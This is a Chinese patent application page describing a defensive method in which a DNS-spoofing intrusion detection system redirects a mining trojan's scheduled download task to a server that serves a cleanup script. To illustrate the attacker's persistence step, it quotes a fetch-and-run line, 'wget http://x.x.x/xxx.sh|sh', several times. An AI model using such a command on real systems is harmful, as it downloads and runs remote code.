CN116467709A - 一种计算机病毒清理方法、系统、装置及电子设备 - Google Patents
一种计算机病毒清理方法、系统、装置及电子设备 Download PDFInfo
- Publication number
- CN116467709A CN116467709A CN202310275344.2A CN202310275344A CN116467709A CN 116467709 A CN116467709 A CN 116467709A CN 202310275344 A CN202310275344 A CN 202310275344A CN 116467709 A CN116467709 A CN 116467709A
- Authority
- CN
- China
- Prior art keywords
- script
- virus
- computer
- domain name
- server
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
- 241000700605 Viruses Species 0.000 title claims abstract description 226
- 238000004140 cleaning Methods 0.000 title claims abstract description 89
- 238000000034 method Methods 0.000 title claims abstract description 74
- 238000013515 script Methods 0.000 claims abstract description 202
- 238000004458 analytical method Methods 0.000 claims description 15
- 238000001514 detection method Methods 0.000 claims description 10
- 238000004590 computer program Methods 0.000 claims description 7
- 238000005316 response function Methods 0.000 claims description 6
- 230000008569 process Effects 0.000 description 13
- ZXQYGBMAQZUVMI-GCMPRSNUSA-N gamma-cyhalothrin Chemical compound CC1(C)[C@@H](\C=C(/Cl)C(F)(F)F)[C@H]1C(=O)O[C@H](C#N)C1=CC=CC(OC=2C=CC=CC=2)=C1 ZXQYGBMAQZUVMI-GCMPRSNUSA-N 0.000 description 10
- 238000010586 diagram Methods 0.000 description 8
- 238000005065 mining Methods 0.000 description 7
- 238000012545 processing Methods 0.000 description 7
- 238000004891 communication Methods 0.000 description 6
- 230000006872 improvement Effects 0.000 description 4
- 230000009471 action Effects 0.000 description 3
- 230000008878 coupling Effects 0.000 description 3
- 238000010168 coupling process Methods 0.000 description 3
- 238000005859 coupling reaction Methods 0.000 description 3
- 230000002159 abnormal effect Effects 0.000 description 2
- 230000009286 beneficial effect Effects 0.000 description 2
- 238000004422 calculation algorithm Methods 0.000 description 2
- 238000011161 development Methods 0.000 description 2
- 230000000694 effects Effects 0.000 description 2
- 238000012544 monitoring process Methods 0.000 description 2
- 230000035699 permeability Effects 0.000 description 2
- 230000003068 static effect Effects 0.000 description 2
- 230000006399 behavior Effects 0.000 description 1
- 230000008901 benefit Effects 0.000 description 1
- 230000005540 biological transmission Effects 0.000 description 1
- 238000004364 calculation method Methods 0.000 description 1
- 230000010485 coping Effects 0.000 description 1
- 238000013461 design Methods 0.000 description 1
- 238000005516 engineering process Methods 0.000 description 1
- 230000006870 function Effects 0.000 description 1
- 230000005484 gravity Effects 0.000 description 1
- 208000015181 infectious disease Diseases 0.000 description 1
- 230000007246 mechanism Effects 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 238000011022 operating instruction Methods 0.000 description 1
- 230000000750 progressive effect Effects 0.000 description 1
- 230000004044 response Effects 0.000 description 1
- 230000001960 triggered effect Effects 0.000 description 1
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/34—Network arrangements or protocols for supporting network services or applications involving the movement of software or configuration parameters
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/566—Dynamic detection, i.e. detection performed at run-time, e.g. emulation, suspicious activities
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/568—Computer malware detection or handling, e.g. anti-virus arrangements eliminating virus, restoring damaged files
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L61/00—Network arrangements, protocols or services for addressing or naming
- H04L61/45—Network directories; Name-to-address mapping
- H04L61/4505—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols
- H04L61/4511—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols using domain name system [DNS]
-
- Y—GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
- Y02—TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
- Y02D—CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
- Y02D30/00—Reducing energy consumption in communication networks
- Y02D30/50—Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Software Systems (AREA)
- Computer Hardware Design (AREA)
- General Engineering & Computer Science (AREA)
- Theoretical Computer Science (AREA)
- Health & Medical Sciences (AREA)
- Virology (AREA)
- Signal Processing (AREA)
- General Health & Medical Sciences (AREA)
- Computer Networks & Wireless Communication (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Information Transfer Between Computers (AREA)
Abstract
本申请实施例提供一种计算机病毒清理方法、系统、装置及电子设备,所述计算机病毒清理方法,通过在预设的目标服务器存储病毒清除脚本,并在计算机检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名解析为预设的目标服务器的IP地址,进而从所述目标服务器下载并运行所述病毒清除脚本,从而利用所述病毒清除脚本完成对计算机病毒的清除,保证计算机不再被相同的计算机病毒侵扰。
Description
技术领域
本申请涉及计算机技术领域,具体涉及一种计算机病毒清理方法、装置、电子设备及存储介质。
背景技术
随着互联网制度的不断完善和发展,以及相关法律法规的完善,黑产攻击者对互联网的攻击对象逐渐由一些较为活跃的DDOS(Distribution Denial of Service,分布式拒绝服务攻击)逐渐转向犯罪成本低、收益稳定其他攻击方式(例如,通过计算机病毒使用他人的计算机进行加密货币的挖掘活动),这种攻击方式具有多样化、行踪隐蔽、横向渗透能力强等多种特点。现有技术中,应对计算机病毒产生的安全事故,主要依托计算机安全平台的检测和告警,但此种方式并不能杜绝此类安全事故的发生。
因此,如何完成计算机病毒的清理任务,以消除计算机病毒产生的安全事故,成为本领域技术人员亟需解决的技术问题。
发明内容
本申请实施例提供一种计算机病毒清理方法、系统、装置及电子设备,以完成计算机病毒的清理任务,消除计算机病毒产生的安全事故。
根据本申请实施例的第一方面,提供了一种计算机病毒清理方法,包括:
当检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,所述目标服务器中存储有病毒清除脚本;
执行域名解析后的所述脚本下载任务,从所述目标服务器下载所述病毒清除脚本;
运行所述病毒清除脚本
在本申请的一种可选实施方式中,从所述目标服务器下载的所述病毒清除脚本的文件格式与所述脚本下载任务的病毒文件的文件格式相同。
在本申请的一种可选实施方式中,所述将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,包括:
通过入侵检测系统的DNS伪装代理响应功能,对所述脚本下载任务的服务器域名进行DNS解析,得到解析结果;
所述解析结果标识所述脚本下载任务的服务器域名为所述预设的目标服务器的IP地址。
根据本申请实施例的第二方面,提供了一种计算机病毒清理方法,其特征在于,应用于目标服务器,所述目标服务器存储有病毒清除脚本,包括:
获得计算机发送的脚本下载请求,所述脚本下载请求为计算机向所述目标服务器的IP地址发送的脚本下载请求;所述目标服务器的IP地址通过对脚本下载任务的服务器域名的解析获得,其中,所述脚本下载任务的服务器域名为病毒服务器域名;
将所述病毒清除脚本发送至所述计算机。
在本申请的一种可选实施方式中,所述病毒清除脚本的文件格式与所述脚本下载任务的病毒文件的文件格式相同。
根据本申请实施例的第三方面,提供了一种计算机病毒清理系统,包括:计算机、目标服务器;
所述计算机,用于当检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,并向所述目标服务器发送脚本下载请求;所述目标服务器中存储有病毒清除脚本;
所述目标服务器,用于将所述病毒清除脚本发送至计算机;
所述计算机,还用于下载并运行所述病毒清除脚本。
根据本申请实施例的第四方面,提供了一种计算机病毒清理装置,包括:
第一单元,用于当检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,所述目标服务器中存储有病毒清除脚本;
第二单元,用于执行域名解析后的所述脚本下载任务,从所述目标服务器下载所述病毒清除脚本;
第三单元,用于运行所述病毒清除脚本。
根据本申请实施例的第四方面,提供了一种计算机病毒清理装置,应用于目标服务器,所述目标服务器存储有病毒清除脚本,包括:
第四单元,用于获得计算机发送的脚本下载请求,所述脚本下载请求为计算机向所述目标服务器的IP地址发送的脚本下载请求;所述目标服务器的IP地址通过对脚本下载任务的服务器域名的解析获得,其中,所述脚本下载任务的服务器域名为病毒服务器域名;
第五单元,用于将所述病毒清除脚本发送至所述计算机。
根据本申请实施例的第五方面,提供了一种电子设备,包括:
处理器;
用于存储所述处理器可执行指令的存储器;
所述处理器,用于通过运行所述存储器中的指令,执行上述计算机病毒清理方法。
根据本申请实施例的第六方面,提供了一种计算机存储介质,所述存储介质存储有计算机程序,所述计算机程序被处理器运行时,执行上述计算机病毒清理方法。
与现有技术相比,本申请具有以下优点:
本申请提供一种计算机病毒清理方法、装置、电子设备及存储介质,应用于计算机,包括:当检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,所述目标服务器中存储有病毒清除脚本;执行域名解析后的所述脚本下载任务,从所述目标服务器下载所述病毒清除脚本;运行所述病毒清除脚本。
该方法通过在预设的目标服务器存储病毒清除脚本,并在计算机检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名解析为预设的目标服务器的IP地址,进而从所述目标服务器下载并运行所述病毒清除脚本,从而利用所述病毒清除脚本完成对计算机病毒的清除,保证计算机不再被相同的计算机病毒侵扰。
附图说明
为了更清楚地说明本申请实施例或现有技术中的技术方案,下面将对实施例或现有技术描述中所需要使用的附图作简单地介绍,显而易见地,下面描述中的附图仅仅是本申请的实施例,对于本领域普通技术人员来讲,在不付出创造性劳动的前提下,还可以根据提供的附图获得其他的附图。
图1为本申请一实施例提供的计算机病毒清理系统的结构示意图;
图2为本申请另一实施例提供的第一种计算机病毒清理方法流程图;
图3为本申请另一实施例提供的第二种计算机病毒清理方法流程图;
图4为本申请实施例提供的第一种计算机病毒清理装置结构示意图;
图5为本申请实施例提供的第二种计算机病毒清理装置结构示意图;
图6为本申请另一实施例提供的电子设备结构示意图。
具体实施方式
下面将结合本申请实施例中的附图,对本申请实施例中的技术方案进行清楚、完整地描述,显然,所描述的实施例仅仅是本申请一部分实施例,而不是全部的实施例。基于本申请中的实施例,本领域普通技术人员在没有做出创造性劳动前提下所获得的所有其他实施例,都属于本申请保护的范围。
随着互联网制度的不断完善和发展,以及相关法律法规的完善,黑产攻击者对互联网的攻击对象逐渐由一些较为活跃的DDOS(Distribution Denial of Service,分布式拒绝服务攻击)逐渐转向犯罪成本低、收益稳定其他攻击方式(例如,通过计算机病毒使用他人的计算机进行加密货币的挖掘活动),这种攻击方式具有多样化、行踪隐蔽、横向渗透能力强等多种特点。
目前,企业和机构在应对由计算机病毒产生的安全事件时,主要依靠计算机安全平台的检测和告警,进而在主机层面或网络层面识别计算机病毒的攻击事件,并触发应急流程,以对计算机病毒的相关进程、文件以及任务进行排查处置。
但由于现有的计算机病毒具备很强的横向传播能力,如果企业和机构的内网中有一台计算机感染计算机病毒,会导致内网的很多计算机都会感染该计算机病毒,现有技术中,为了应对此类计算机病毒的安全事故,需要登陆各个计算机一一完成计算机病毒的清理工作,清理效率较低,且可能还会存在部分机器无法找到管理员或计算机权限丢失的情况,安全事故无法抑制或闭环。
因此,如何完成计算机病毒的清理任务,以消除计算机病毒产生的安全事故,成为本领域技术人员亟需解决的技术问题。
为解决上述技术问题,本申请提供一种计算机病毒的清理方法、装置、电子设备及存储介质,在以下的实施例中将逐一进行详细说明。
示例性系统
为了便于理解本申请实施例提供的方案,首先结合所述计算机病毒清理方法的使用场景,对计算机病毒清理系统进行详细介绍。
请参考图1,图1为本申请一实施例提供的计算机病毒清理系统的结构示意图。
如图1所示,所述计算机病毒清理系统,包括:计算机101、目标服务器102。
在本申请实施例中,所述计算机病毒清理系统主要用于清理计算机101中的挖矿木马。
所述挖矿木马是指一些不法分子在计算机用户不知情的情况下,通过各种手段植入计算机中的挖矿程序,该挖矿程序具体为用于利用用户计算机的运算力进行挖矿的程序。
在本申请实施例中,在计算机101感染挖矿木马后,不法分子为了保证在挖矿木马的相关文件和进程被用户发现并删除后,该挖矿木马也能运行,一般会在计算机系统的计划任务或启动项等位置,留下执行该挖矿木马的下载脚本,以便于该脚本可以根据计算机配置,固定周期的执行一次。
例如:所述挖矿木马的下载脚本可以是“wget http://x.x.x/xxx.sh|sh”,进而使得计算机101周期性的访问域名“x.x.x”,下载该域名中存储的木马病毒。
其中,计算机101,用于当检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,并向所述目标服务器发送脚本下载请求;所述目标服务器中存储有病毒清除脚本。
所述将脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,包括:通过计算机101入侵检测系统的DNS伪装代理响应功能,对所述脚本下载任务进行DNS解析,得到解析结果,其中,所述解析结果标识所述脚本下载任务的服务器域名为目标服务器102的IP地址。
目标服务器102可以理解为一种WEB服务器,WEB服务器,一般是指“网站服务器”,是指驻留于互联网上某种类型计算机的程序。WEB服务器可以向WEB浏览器等客户端提供文档,也可以放置网站文件,让全世界浏览,更可以放置数据文件,让全世界下载。
在本申请实施例中,在计算机101将脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址后,计算机101执行所述脚本下载任务,并向目标服务器发送脚本下载请求。
进一步的,目标服务器102,用于将所述病毒清除脚本发送至计算机101。计算机101,还用于下载并运行所述病毒清除脚本。
在计算机101在下载并运行所述病毒清除脚本后,通过所述病毒清除脚本完成对所述挖矿木马的相关进程、文件以及配置的清除任务,实现对所述挖矿木马的自动清理。
需要说明的是,以上对本申请场景实施例的介绍只是为了便于更好的理解本申请提供的所述计算机病毒清理系统,而非用于对所述计算机病毒清理系统的应用场景进行限定,所述计算机病毒清理系统还可以应用于其它场景,比如说,用于其它木马病毒的清理任务等。
示例性方法一
本申请实施例同时提供一种计算机病毒清理方法,应用于计算机,其核心在于,通过在预设的目标服务器存储病毒清除脚本,并在计算机检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名解析为预设的目标服务器的IP地址,进而从所述目标服务器下载并运行所述病毒清除脚本,从而利用所述病毒清除脚本完成对计算机病毒的清除,保证计算机不再被相同的计算机病毒侵扰。
在本申请的一种可选实施方式中,所述计算机病毒清理方法的实施主体(计算机)可以理解为笔记本电脑、平板电脑、台式计算机、移动设备(例如:移动电话、游戏主机、专用消息设备)等各种类型的用户终端或者是这些数据处理设备中的任意两个或多个的组合,也可以是服务器。
请参考图2,图2为本申请另一实施例提供的第一种计算机病毒清理方法流程图。
如图2所示,所述计算机病毒清理方法包括以下步骤S201至步骤S203:
步骤S201,当检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,所述目标服务器中存储有病毒清除脚本。
在计算机感染计算机病毒后,黑产攻击者为了保证即使计算机病毒的相关文件和进程被删除后,该计算机病毒也能被运行。一般会在计算机系统的计划任务或启动项等其他位置,留下该计算机病毒的下载脚本,以便于在计算机病毒的文件和进程被清除调后,可以再次通过计算机系统计划地执行该下载脚本,以完成对计算机病毒的重部署。
比如说,在Linux操作系统中,黑产攻击者会在计算机的计划任务中写入“wgethttp://x.x.x/xxx.sh|sh”,进而在计算机病毒被清理后,通过执行“wget http://x.x.x/xxx.sh|sh”这一内容,重新将所述计算机病毒下载至计算机中。
其中,“wget”是一种下载文件的工具,用于在命令行下,下载一些软件或从远程服务器恢复备份到本地服务器;“x.x.x”是指域名,该域名中存储有计算机病毒,“sh”表示脚本。
在上述步骤S201中,所述脚本下载任务即为类似“wget http://x.x.x/xxx.sh|sh”这一内容的任务,所述脚本下载任务中的病毒服务器域名即为其中的“x.x.x”。
进一步的,所述目标服务器可以理解为一台事先准备的WEB服务器,其中,所述目标服务器具体用于部署病毒清除脚本。
在本申请的一种可选实施方式中,所述病毒清除脚本可以事先部署在所述目标服务器中,也可以是在计算机被计算机病毒攻击后,通过分析所述计算机病毒产生的攻击事件后,再在所述目标服务器的相关目录下部署相应的病毒清除脚本。
其中,所述病毒清除脚本,包括但不限于一些常见的、与脚本下载任务的后缀相同的病毒清除脚本,比如说,假设所述脚本下载任务为“wget http://x.x.x/xxx.sh|sh”,则对应该脚本下载任务,部署至所述目标服务器中的病毒清除脚本的后缀应为“sh”。
进一步的,检测所述脚本下载任务的服务器是否为病毒服务器域名的过程,可以通过预设域名黑名单的方式实现,即,预先存储若干病毒服务器域名,当所述脚本下载任务的服务器域名与所述预先存储的病毒服务器域名相同时,则认为所述脚本下载任务的服务器域名为病毒服务器域名。
进一步的,所述将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,包括:
通过入侵检测系统的DNS伪装代理响应功能,对所述脚本下载任务的服务器域名进行DNS解析,得到解析结果;
所述解析结果标识所述脚本下载任务的服务器域名为所述预设的目标服务器的IP地址。
所述入侵检测系统可以理解为一种计算机服务器中用于按照一定的安全策略,通过软件、硬件,对网络、系统的运行环境进行监视,发现各种攻击企图、攻击行为或者攻击结果,以保证网络系统资源机密性、完整性和可用性的监测系统。
在实际应用的过程中,当监测到脚本下载任务的服务器域名为病毒服务器域名时,所述计算机的服务器会执行DNS请求操作,以对所述脚本下载任务中的域名进行解析,确定所述脚本下载任务中的域名对应的IP地址。
而在本申请实施例中,对所述脚本下载任务中的域名进行解析之前,在所述入侵检测系统中启用DNS伪装代理响应功能,以针对所述病毒服务器域名进行伪装代理响应,从而实现http或https请求的流量劫持,从而将所述脚本下载任务中的域名解析为所述目标服务器的IP地址。
比如说,假设所述脚本下载任务对应的病毒服务器域名的访问请求为“http://x.x.x/xxx.sh”,则所述入侵检测系统针对“x.x.x”的域名的DNS解析过程进行伪装代理处理,从而将域名“x.x.x”解析到所述目标服务器的IP地址,此时,所述计算机会执行“wgethttp://目标服务器的IP地址/xxx.sh”,进而基于http或https协议访问目标服务器的IP地址,通过所述目标服务器获得所述目标服务器中存储的病毒清除脚本。
步骤S202,执行域名解析后的所述脚本下载任务,从所述目标服务器下载所述病毒清除脚本。
在本申请实施例中,所述目标服务器下载的所述病毒清除脚本的文件格式与所述脚本下载任务的病毒文件的文件格式相同。
即,所述计算机会基于所述脚本下载任务,从所述目标服务器中下载与所述脚本下载任务后缀相同的文件。
比如说,假设所述脚本下载任务为“wget http://x.x.x/xxx.sh|sh”的情况下,则将所述脚本下载任务的病毒服务器域名解析为目标服务器的IP地址后,则会从所述目标服务器中下载后缀为“.sh”的脚本作为所述病毒清除脚本。
在本申请的一种可选实施方式中,可以通过以下方式确定在所述目标服务器中部署的病毒清除脚本:
首先,在确定所述计算机感染的计算机病毒后,根据所述计算机产生的异常参数,确定所述计算机感染的计算机病毒类型,其次,在所述目标服务器,部署与所述计算机病毒类型相同的病毒清除脚本。
或者是,获得所述计算机感染的历史计算机病毒类型,之后,在所述目标服务器部署与所述历史计算机病毒类型相同的病毒清除脚本。
步骤S203,运行所述病毒清除脚本。
在所述计算机获得所述病毒清除脚本后,即可通过运行所述病毒清除脚本清除该计算机上的与所述病毒清除脚本对应的不正常进程、文件和配置,从而实现对计算机病毒的自动清除。
综上所述,所述计算机病毒清理方法,通过在预设的目标服务器存储病毒清除脚本,并在计算机检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名解析为预设的目标服务器的IP地址,进而从所述目标服务器下载并运行所述病毒清除脚本,从而利用所述病毒清除脚本完成对计算机病毒的清除,保证计算机不再被相同的计算机病毒侵扰。
示例性方法二
本申请实施例同时还提供另一种计算机病毒清理方法,应用于目标服务器。
请参考图3,图3为本申请另一实施例提供的第二种计算机病毒清理方法流程图。
如图3所示,所述计算机病毒清理方法,包括以下步骤S301和步骤S302:
步骤S301,获得计算机发送的脚本下载请求,所述脚本下载请求为计算机向所述目标服务器的IP地址发送的脚本下载请求;所述目标服务器的IP地址通过对脚本下载任务的服务器域名的解析获得,其中,所述脚本下载任务的服务器域名为病毒服务器域名;
步骤S302,将所述病毒清除脚本发送至所述计算机。
在本申请的一种可选实施方式中,所述病毒清除脚本的文件格式与所述脚本下载任务的病毒文件的文件格式相同。
需要说明的是,本申请提供的上述第二种计算机病毒清理方法与所述第一种计算机病毒清理方法属于同一申请构思。未在本实施例中详尽描述的技术细节,可参见本申请提供的第一种计算机病毒清理方法的具体处理内容,此处不再加以赘述。
示例性装置一
相应的,本申请实施例还提供了一种计算机病毒清理装置,请参考图4,图4为本申请实施例提供的第一种计算机病毒清理装置结构示意图。
如图4所示,所述计算机病毒清理装置,包括:
第一单元401,用于当检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,所述目标服务器中存储有病毒清除脚本;
第二单元402,用于执行域名解析后的所述脚本下载任务,从所述目标服务器下载所述病毒清除脚本;
第三单元403,用于运行所述病毒清除脚本。
在本申请的一种可选实施方式中,从所述目标服务器下载的所述病毒清除脚本的文件格式与所述脚本下载任务的病毒文件的文件格式相同。
在本申请的一种可选实施方式中,所述将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,包括:
通过入侵检测系统的DNS伪装代理响应功能,对所述脚本下载任务的服务器域名进行DNS解析,得到解析结果;
所述解析结果标识所述脚本下载任务的服务器域名为所述预设的目标服务器的IP地址。
本实施例提供的计算机病毒清理装置,与本申请上述实施例所提供的第一种计算机病毒清理方法属于同一申请构思,可执行本申请上述任意实施例所提供的计算机病毒清理方法,具备执行所述计算机病毒清理方法相应的功能模块和有益效果。未在本实施例中详尽描述的技术细节,可参见本申请上述实施例提供的计算机病毒清理方法的具体处理内容,此处不再加以赘述。
示例性装置二
本申请实施例还提供另一种计算机病毒清理装置,请参考图5,图5为本申请实施例提供的第二种计算机病毒清理装置结构示意图。
如图5所示,所述计算机病毒清理装置,包括:
第四单元501,用于获得计算机发送的脚本下载请求,所述脚本下载请求为计算机向所述目标服务器的IP地址发送的脚本下载请求;所述目标服务器的IP地址通过对脚本下载任务的服务器域名的解析获得,其中,所述脚本下载任务的服务器域名为病毒服务器域名;
第五单元501,用于将所述病毒清除脚本发送至所述计算机。
在本申请的一种可选实施方式中,所述病毒清除脚本的文件格式与所述脚本下载任务的病毒文件的文件格式相同。
本实施例提供的计算机病毒清理装置,与本申请上述实施例所提供的第二种计算机病毒清理方法属于同一申请构思,可执行本申请上述任意实施例所提供的计算机病毒清理方法,具备执行所述计算机病毒清理方法相应的功能模块和有益效果。未在本实施例中详尽描述的技术细节,可参见本申请上述实施例提供的计算机病毒清理方法的具体处理内容,此处不再加以赘述。
示例性电子设备
本申请另一实施例还提出一种电子设备,请参考图6,图6为本申请另一实施例提供的电子设备结构示意图。
如图6所示,该设备包括:
存储器200和处理器210;
其中,所述存储器200与所述处理器210连接,用于存储程序;
所述处理器210,用于通过运行所述存储器200中存储的程序,实现上述任一实施例公开的计算机病毒清理方法。
具体的,上述电子设备还可以包括:总线、通信接口220、输入设备230和输出设备240。
处理器210、存储器200、通信接口220、输入设备230和输出设备240通过总线相互连接。其中:
总线可包括一通路,在计算机系统各个部件之间传送信息。
处理器210可以是通用处理器,例如通用中央处理器(CPU)、微处理器等,也可以是特定应用集成电路(application-specific integrated circuit,ASIC),或一个或多个用于控制本发明方案程序执行的集成电路。还可以是数字信号处理器(DSP)、专用集成电路(ASIC)、现成可编程门阵列(FPGA)或者其他可编程逻辑器件、分立门或者晶体管逻辑器件、分立硬件组件。
处理器210可包括主处理器,还可包括基带芯片、调制解调器等。
存储器200中保存有执行本发明技术方案的程序,还可以保存有操作系统和其他关键业务。具体地,程序可以包括程序代码,程序代码包括计算机操作指令。更具体的,存储器200可以包括只读存储器(read-only memory,ROM)、可存储静态信息和指令的其他类型的静态存储设备、随机存取存储器(random access memory,RAM)、可存储信息和指令的其他类型的动态存储设备、磁盘存储器、flash等等。
输入设备230可包括接收用户输入的数据和信息的装置,例如键盘、鼠标、摄像头、扫描仪、光笔、语音输入装置、触摸屏、计步器或重力感应器等。
输出设备240可包括允许输出信息给用户的装置,例如显示屏、打印机、扬声器等。
通信接口220可包括使用任何收发器一类的装置,以便与其他设备或通信网络通信,如以太网,无线接入网(RAN),无线局域网(WLAN)等。
处理器210执行存储器200中所存放的程序,以及调用其他设备,可用于实现本申请上述实施例所提供的任意一种计算机病毒清理方法的各个步骤。
示例性计算机程序产品和存储介质
除了上述方法和设备以外,本申请的实施例还可以是计算机程序产品,其包括计算机程序指令,所述计算机程序指令在被处理器运行时使得所述处理器执行本说明书上述“示例性方法”部分中描述的根据本申请各种实施例的计算机病毒清理方法中的步骤。
所述计算机程序产品可以以一种或多种程序设计语言的任意组合来编写用于执行本申请实施例操作的程序代码,所述程序设计语言包括面向对象的程序设计语言,诸如Java、C++等,还包括常规的过程式程序设计语言,诸如“C”语言或类似的程序设计语言。程序代码可以完全地在用户计算设备上执行、部分地在用户设备上执行、作为一个独立的软件包执行、部分在用户计算设备上部分在远程计算设备上执行、或者完全在远程计算设备或服务器上执行。
此外,本申请的实施例还可以是存储介质,其上存储有计算机程序,计算机程序被处理器执行本说明书上述“示例性方法”部分中描述的根据本申请各种实施例的计算机病毒清理方法中的步骤,具体可以实现以下步骤:
步骤S201,当检测到脚本下载任务的服务器域名为病毒服务器域名时,将所述脚本下载任务的服务器域名,解析为预设的目标服务器的IP地址,所述目标服务器中存储有病毒清除脚本;
步骤S202,执行域名解析后的所述脚本下载任务,从所述目标服务器下载所述病毒清除脚本;
步骤S203,运行所述病毒清除脚本。
或者,
步骤S301,获得计算机发送的脚本下载请求,所述脚本下载请求为计算机向所述目标服务器的IP地址发送的脚本下载请求;所述目标服务器的IP地址通过对脚本下载任务的服务器域名的解析获得,其中,所述脚本下载任务的服务器域名为病毒服务器域名;
步骤S302,将所述病毒清除脚本发送至所述计算机。
对于前述的各方法实施例,为了简单描述,故将其都表述为一系列的动作组合,但是本领域技术人员应该知悉,本申请并不受所描述的动作顺序的限制,因为依据本申请,某些步骤可以采用其他顺序或者同时进行。其次,本领域技术人员也应该知悉,说明书中所描述的实施例均属于优选实施例,所涉及的动作和模块并不一定是本申请所必须的。
需要说明的是,本说明书中的各个实施例均采用递进的方式描述,每个实施例重点说明的都是与其他实施例的不同之处,各个实施例之间相同相似的部分互相参见即可。对于装置类实施例而言,由于其与方法实施例基本相似,所以描述的比较简单,相关之处参见方法实施例的部分说明即可。
本申请各实施例方法中的步骤可以根据实际需要进行顺序调整、合并和删减,各实施例中记载的技术特征可以进行替换或者组合。
本申请各实施例种装置及终端中的模块和子模块可以根据实际需要进行合并、划分和删减。
本申请所提供的几个实施例中,应该理解到,所揭露的终端,装置和方法,可以通过其它的方式实现。例如,以上所描述的终端实施例仅仅是示意性的,例如,模块或子模块的划分,仅仅为一种逻辑功能划分,实际实现时可以有另外的划分方式,例如多个子模块或模块可以结合或者可以集成到另一个模块,或一些特征可以忽略,或不执行。另一点,所显示或讨论的相互之间的耦合或直接耦合或通信连接可以是通过一些接口,装置或模块的间接耦合或通信连接,可以是电性,机械或其它的形式。
作为分离部件说明的模块或子模块可以是或者也可以不是物理上分开的,作为模块或子模块的部件可以是或者也可以不是物理模块或子模块,即可以位于一个地方,或者也可以分布到多个网络模块或子模块上。可以根据实际的需要选择其中的部分或者全部模块或子模块来实现本实施例方案的目的。
另外,在本申请各个实施例中的各功能模块或子模块可以集成在一个处理模块中,也可以是各个模块或子模块单独物理存在,也可以两个或两个以上模块或子模块集成在一个模块中。上述集成的模块或子模块既可以采用硬件的形式实现,也可以采用软件功能模块或子模块的形式实现。
专业人员还可以进一步意识到,结合本文中所公开的实施例描述的各示例的单元及算法步骤,能够以电子硬件、计算机软件或者二者的结合来实现,为了清楚地说明硬件和软件的可互换性,在上述说明中已经按照功能一般性地描述了各示例的组成及步骤。这些功能究竟以硬件还是软件方式来执行,取决于技术方案的特定应用和设计约束条件。专业技术人员可以对每个特定的应用来使用不同方法来实现所描述的功能,但是这种实现不应认为超出本申请的范围。
结合本文中所公开的实施例描述的方法或算法的步骤可以直接用硬件、处理器执行的软件单元,或者二者的结合来实施。软件单元可以置于随机存储器(RAM)、内存、只读存储器(ROM)、电可编程ROM、电可擦除可编程ROM、寄存器、硬盘、可移动磁盘、CD-ROM、或技术领域内所公知的任意其它形式的存储介质中。
